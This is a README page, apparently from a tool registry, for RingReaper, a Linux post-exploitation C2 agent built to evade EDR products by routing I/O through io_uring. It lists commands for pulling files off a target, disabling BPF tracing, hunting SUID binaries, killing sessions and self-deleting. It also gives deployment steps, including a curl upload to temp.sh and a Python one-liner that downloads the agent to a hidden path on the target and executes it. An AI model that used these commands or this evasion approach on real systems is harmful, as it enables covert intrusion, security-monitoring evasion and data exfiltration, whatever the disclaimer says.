RingReaper
Linux post-exploitation agent that uses io_uring to stealthily bypass EDR detection by avoiding traditional syscalls.
Install / Use
/learn @MatheuZSecurity/RingReaperREADME
RingReaper
RingReaper is a simple post-exploitation agent for Linux designed for those who need to operate stealthily, minimizing the chances of being detected by EDR solutions. The idea behind this project was to leverage io_uring, the new asynchronous I/O interface in the Linux kernel, specifically to avoid traditional system calls that most EDRs tend to monitor or even hook.
In practice, RingReaper replaces calls such as read, write, recv, send, connect, among others, with asynchronous I/O operations (io_uring_prep_*), reducing exposure to hooks and event tracing typically collected in a standardized way by security products.
NOTE: Some functions within RingReaper still rely on traditional calls, such as directory reading (
opendir,readdir) or symbolic link resolution (readlink), because io_uring does not yet fully support these types of operations natively. Even so, during my tests, these calls did not trigger alerts on the tested EDRs, precisely because they fall outside the monitored network I/O paths.
In summary, RingReaper was built to avoid traditional calls as much as possible, and even in cases where it had to use them, it demonstrated excellent evasion capabilities, with no alerts or detections from common security agents.
See the full and detailed article at:
https://matheuzsecurity.github.io/hacking/evading-linux-edrs-with-io-uring/
Author: https://www.linkedin.com/in/mathsalves/
Rootkit Researchers
- https://discord.gg/66N5ZQppU7
Command Reference
| Command | Description | Backend |
|---------------|----------------------------------------------------------|----------------------|
| get | Look files from the target | 100% io_uring |
| put | Upload files (uses recv on the agent side) | 100% io_uring |
| killbpf | Disable tracing, remove /sys/fs/bpf files and kill processes using bpf-map | traditional calls + io_uring |
| users | List logged-in users by reading utmp | 100% io_uring |
| ss / netstat | List TCP connections from /proc/net/tcp | 100% io_uring |
| privesc | Search for SUID binaries using statx | 100% io_uring |
| ps | List processes (uses opendir, readdir) | traditional calls + io_uring |
| kick | Kill pts sessions (uses opendir, readdir, kill, readlink) | traditional calls + io_uring |
| me | Show PID/TTY (getpid, ttyname) | traditional calls + io_uring |
| selfdestruct| Delete the current binary (uses readlink) | traditional calls + io_uring |
| exit | Terminate connection and exit | 100% io_uring |
| help | Display help | 100% io_uring |
In RingReaper, all data traffic, including control commands, uploads, and downloads, must pass through io_uring. This also ensures that the most sensitive operations remain off the radar of hooks and EDR monitoring based on traditional calls.
About Evasion
RingReaper was designed from the ground up to bypass EDR monitoring. Many security solutions base their detection triggers on intercepting classic syscalls (read, recv, send, connect) at the kernel level. Since io_uring is relatively new and less integrated into the telemetry pipeline of these products, it often goes unnoticed by most agents, allowing for C2 sessions and data exfiltration without triggering alerts.
Even functions that still rely on older syscalls (such as directory reading) remained discreet enough not to raise alarms.
Requirements
- Linux kernel 5.1 or higher
liburinglibrary- A compatible C compiler (tested with GCC)
Env
Tested ONLY on the following kernel versions below;
- 6.8.0-60-generic
- 6.12.25-amd64
Compilation
sudo apt install liburing-dev -y
gcc agent.c -o agent -luring -O2 -s -static
Execution
In testing, I noticed that EDR detected the compilation of agent.c by monitoring GCC usage in real time (it's better not to use wget/curl). To bypass this, I compiled the agent statically on my machine, sent the finished binary via temp.sh and used Python on the target to download and execute it. This technique worked without warning.
Server (Attack box) :
curl -F "file=@agent" https://temp.sh/uploadpython3 server.py --ip IP --port 443
Agent (Target machine) :
python3 -c "import urllib.request,os,subprocess; u=urllib.request.Request('http://temp.sh/xxxx/stealth_agent',method='POST'); d='/var/tmp/.X11'; open(d,'wb').write(urllib.request.urlopen(u).read()); os.chmod(d,0o755); subprocess.Popen([d]);"
Upgrades
Version 2.0:
- Support for multiple threaded connections.
- Command history (using the "up" and "down" keys).
- "Clear" command to avoid cluttering the screen.
Contribution
Feel free to make pull requests and contribute to the project. Any errors with RingReaper, please create an issue and report it to us.
Disclaimer
This code was developed solely for educational purposes, research, and controlled demonstrations of evasion techniques. Any use outside authorized environments, or for malicious purposes, is strictly prohibited and entirely the responsibility of the user. Unauthorized or illegal use may violate local, national, or international laws.
Related Skills
node-connect
345.9kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
106.4kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
345.9kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
345.9kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
